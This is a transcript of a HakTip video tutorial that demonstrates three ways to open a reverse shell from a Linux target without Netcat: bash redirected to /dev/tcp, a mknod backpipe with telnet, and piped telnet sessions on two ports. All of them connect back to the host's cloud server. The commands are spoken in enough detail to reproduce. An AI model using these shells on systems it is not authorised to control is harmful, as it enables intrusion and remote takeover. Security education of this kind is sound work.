This hack tip is brought to you by JackThreads.
Hello and welcome to HakTip, the show where we break down the concepts, tools, and techniques for hackers, gurus, and IT ninjas. I'm your host, Darren Kitchen, and today we're having fun with a little bit of cats. Because it's the internet, and we're doing cats. Anyway, it's Netcat. You guys know Netcat is like an awesome Swiss Army knife of TCP/IP when it comes to the internet. I shouldn't have to explain it to you already. You guys know that it is like the quick and dirty and easy way to set up a communication between two machines, whether that's two Linux hosts or a Windows and a Mac and a Linux machine. It really doesn't matter because Netcat is universal and super easy because it allows you to just over plain text, talk to one another, and we're going to be using it today to do what's called a little bit of reverse shell action, and that is helpful for remote administration, and I'm mainly focusing on the Linux platform right here. And what I'm going to be doing is showing you how you can Netcat without using Netcat. There's plenty of ways to do this exact thing if Netcat is installed on, say, our target machine, the machine that we want to do remote administration on. But we're going to be pretending, for example, the machine that we want to remotely administer does not have Netcat. Just has your basic tools that would come on a Windows machine, or I'm sorry, not a Windows machine, a Linux machine. And we're going to be focusing on being able to get an interactive shell using bash. So that's /bin/bash, and we're going to take that, we're going to put it through the internet tubes with the kittens, and it will show up on the other end at our virtual private server. So on the right here, you'll see root at Coconut. This is my server in the cloud where we are going to be sending our traffic to. And this machine run by us, we have Netcat installed on, and we're going to go ahead and start listening to our target machines here. So first of all, we need to do NC for Netcat, TAC L for listen, TAC N for no DNS, and then TAC VV for very verbose, and TAC P for the port. I'm just going to use 8080. That port just gets used for everything, doesn't it? And there we go. We're listening on port 8080. So over on the left window, we have our local machine. And I'm going to use the first method is actually going to be really cool because I'm actually just going to use bin bash and then send that through the internet using some dev TCP action. So get this. So /bin/bash. And then if I use TAC I can now redirect that to /dev/TCP, and in this case, the IP address of my server, which is 173.214.173.151, and then slash the port 8080, and then we're going to go ahead and take care of our standard input error and whatnot with a little bit of 0 less than &1, and then 2 greater than &1. And then if I go ahead and run that, you're going to notice on the right, suddenly my prompt doesn't say root at Coconut anymore. No, it says Darren at DK10, DK10 being the host name of this laptop here. And now if I do like ls, I can see not only do I have my prompt and I can enter commands, I can see the output of those commands. I'm going to run clear. And there we go. And it's very interactive and it's very easy. And so if you can just go ahead and issue bin bash on your target, you can go ahead and send it through /dev/TCP as just like a raw connection. So super simple. Now that method may not always work on your target machine. So for that instance, I'm going to go ahead and exit here in the cloud, and I'm back to my Coconut. And I'm going to go ahead and reissue my listener. So again, I'm listening on port 8080. And we're going to use a little bit of a different method here. What I'm going to do is use mknod, and we're going to do a little thing called backpiping. So I'm going to do a backpipe, and then P, and then ampersand, and this time we're going to use telnet. Telnet should be on most any box that you encounter. So telnet, and then to our server, 173.214.173.151, space 8080 for the port, and then again, we're going to redirect backpipe into it, and then we're going to pipe all of that to /bin/bash, and then redirect our backpipe again. And when I issue that, I get these 3 little errors saying that it's not found, but if you look over here, well, it's because trying, connect, and escape telnet aren't commands in bash. But if you look over here, it says I am now connected from the unknown IP address, and if I do an ls, I can see there are my files. If I do clear, there we go. And you'll notice though that like if I do pwd, it'll show where I am on this machine, but I don't actually get the prompt. So it's not as pretty, but there you go. Just with using telnet and a little bit of backpiping redirection, we're able to create a Netcat tunnel straight up to our server in the cloud. Now stay tuned, because in just a bit I'm going to show you my third very messy but also really fun method for doing this after we take a quick break.
If you love alternative apparel brands like Kid Robot, Hurley, and Stussy, but hate wasting cash, heads up. You can score up to 80% off these premium brands every day at JackThreads, the new invite-only shopping club just for guys. There's normally a wait list to join, but we've got the hookup, so head over to jackthreads.com/hack5 and join now for free to get instant access to their hookups on street, skate, and surfwear brands.
We're back, and as you can see over on the right here, we have two windows now because this one gets pretty sticky. So I have both of these windows here are connected to my server in the cloud, and both of them are logged in to Coconut, and we're taking a look in the top one. We're listening on port 8080 using Netcat. Now for this, I'm going to have to start another listener using Netcat. So listen, tac n, tac very verbose, and 8888 will be the port we're going to use. Okay, so now I'm listening on both 8080 and 8888, and what we're going to do on our local machine to get our information over there is a lot of fun piping. Check this out. We're going to do telnet to, in this case, the host name is coconut.hack5.org on port 8080, and then we're going to pipe that to /bin/bash, and then we're going to pipe that to telnet to coconut.hack5.org on 8888. And we go ahead and run that. You'll notice over on the top in the 8080, if I issue, for example, ls, down at the bottom, I get my output. So if, say, I were to type pwd in the top window, I would see the answer of the directory that I'm in the bottom window. It's kind of a pain, but there you go. Using just some pipes and telnet and bash, which should be on your system, you can go ahead and create yourselves a nice little reverse shell back to you. This is great for systems administration or all sorts of other fun stuff, and it's been what I've been toying with for a little bit with the new Pineapple and whatnot, so I hope you guys enjoy that, and I have to give mad props to Rami for sending some of these by, because when you encounter a system that doesn't have Netcat installed, this could really save your bacon. Okay, well if you guys have a tip or two, go ahead and hit us up, feedback@hack5.org, or hack5.org/nibbles is a great place to send us some good stuff as well, and we'd love to hear your feedback. And of course, check out hack5.org, where we have our sister show Hack5. I'll be there reminding you to trust your technolist. Hello and welcome to HakTip, the show where we break down the tools, what is it called?